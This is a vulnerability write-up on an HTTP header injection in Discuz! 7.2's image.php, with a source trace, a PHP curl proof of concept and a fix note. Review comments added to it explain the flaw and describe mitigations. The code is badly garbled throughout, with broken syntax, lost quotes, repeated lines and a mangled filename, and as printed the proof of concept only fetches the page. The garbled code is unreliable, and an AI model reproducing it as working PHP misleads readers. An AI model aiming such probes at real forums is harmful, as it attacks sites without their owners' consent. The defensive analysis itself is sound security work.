Dz7.2 (Discuz! 7.2) HTTP header injection vulnerability, 2010/7/7
image.php (the lines below trace the Location header back to its request-derived inputs):
// NOTE(review): this listing is an extraction-garbled excerpt (spaces after "$", lost quotes),
// ordered from the sink backwards to its inputs; it is not contiguous, runnable code.
// Sink: the Location response header is concatenated from $boardurl and $thumbfile.
Header (location:. $ boardurl. $ thumbfile );
// $boardurl = scheme + the client-supplied Host header + a directory prefix cut out of $PHP_SELF.
// htmlspecialchars() encodes HTML metacharacters only and leaves CR/LF untouched, so it is
// not a filter for the HTTP header context this value ends up in.
$ Boardurl = htmlspecialchars (http: //. $ _ SERVER [HTTP_HOST]. preg_replace ("// + (api | archiver | wap )? /* $/I ", substr ($ PHP_SELF, 0, strrpos ($ PHP_SELF ,/)))./);
// Source: $PHP_SELF is copied from $_SERVER[PHP_SELF] (falling back to SCRIPT_NAME); no
// validation is visible in this excerpt. The page prints the same line three times.
$ PHP_SELF = $ _ SERVER [PHP_SELF]? $ _ SERVER [PHP_SELF]: $ _ SERVER [SCRIPT_NAME];
$ PHP_SELF = $ _ SERVER [PHP_SELF]? $ _ SERVER [PHP_SELF]: $ _ SERVER [SCRIPT_NAME];
$ PHP_SELF = $ _ SERVER [PHP_SELF]? $ _ SERVER [PHP_SELF]: $ _ SERVER [SCRIPT_NAME];
// The cache file name is garbled in this copy; it appears to be assembled from $aid, $w and $h
// under forumdata/imagecaches/ -- TODO confirm against the original image.php.
$ Thumbfile = forumdata/imagecaches/.w.aid._.20.1__.20.h..jpg;
// aid and the two halves of size ("WxH") are forced to integers with intval(), so the
// $thumbfile half of the header value is constrained; the $boardurl half is not.
$ Aid = intval ($ _ GET [aid]);
$ W = intval ($ w );
List ($ w, $ h) = explode (x, $ _ GET [size]);
$ H = intval ($ h );
List ($ w, $ h) = explode (x, $ _ GET [size]);
// NOTE(review): PHP 5.1.2 and later (4.4.2 in the 4.x line) make header() refuse a value that
// contains a newline, which blocks header splitting at the runtime level. A redirect built from
// HTTP_HOST / PHP_SELF should still be replaced by a configured base URL.
Conditions that must hold for the redirect to be reached:
// Both checks must pass: $nocache is falsy, and the file named by $thumbfile already exists.
// NOTE(review): the excerpt stops at the opening braces; the page implies the header() call
// shown earlier sits inside this branch -- confirm against the original image.php.
If (! $ Nocache ){
If (file_exists ($ thumbfile )){
POC:
#! /Usr/bin/php-f
<? Php
#
# Image. php curl exploit
# Bincker/2010/7/7/t00ls.net
General settings:
URL:
COOKIEJAR:
Max Exec Time: (s)
SSL: BasicAuth:
$ _ SERVER parameter:
$_SERVER['PHP_SELF'] is derived from the request URL, so its value is controlled by whoever sends the request and must be treated as untrusted input.
//
// Http server,
//
// NOTE(review): garbled listing (spaces after "$", capitalised function names); kept as printed.
// The target host is read from the first command-line argument.
$ Target = $ argv [1];
$ Ch = curl_init ();
// Return the response body as a string instead of printing it directly.
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
// As printed, the request URL is just /image.php on the target, with no query string or extra
// path, so this listing only fetches the page; the tainted value the write-up describes is
// not present in it.
Curl_setopt ($ ch, CURLOPT_URL, "http: // $ target/image. php ");
// Fixed, dated User-Agent string. For defenders: requests to image.php carrying this exact
// value are a cheap log-search pivot, although the string is trivially changed.
Curl_setopt ($ ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0 )");
// Give up after 3 seconds overall, or when the transfer stays below 3 bytes/s for 3 seconds.
Curl_setopt ($ ch, CURLOPT_TIMEOUT, 3 );
Curl_setopt ($ ch, CURLOPT_LOW_SPEED_LIMIT, 3 );
Curl_setopt ($ ch, CURLOPT_LOW_SPEED_TIME, 3 );
// Cookies received are written to a per-target file under /tmp when the handle is closed.
Curl_setopt ($ ch, CURLOPT_COOKIEJAR, "/tmp/cookie _ $ target ");
$ Buf = curl_exec ($ ch );
Curl_close ($ ch );
Unset ($ ch );
// Print the response body; with RETURNTRANSFER alone the response headers (including any
// Location header) are not part of $buf.
Echo $ buf;
?>
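Fix: apply the vendor's official patch. The underlying issue is that the redirect in image.php is built from request-derived values (HTTP_HOST, PHP_SELF) rather than from a configured site URL.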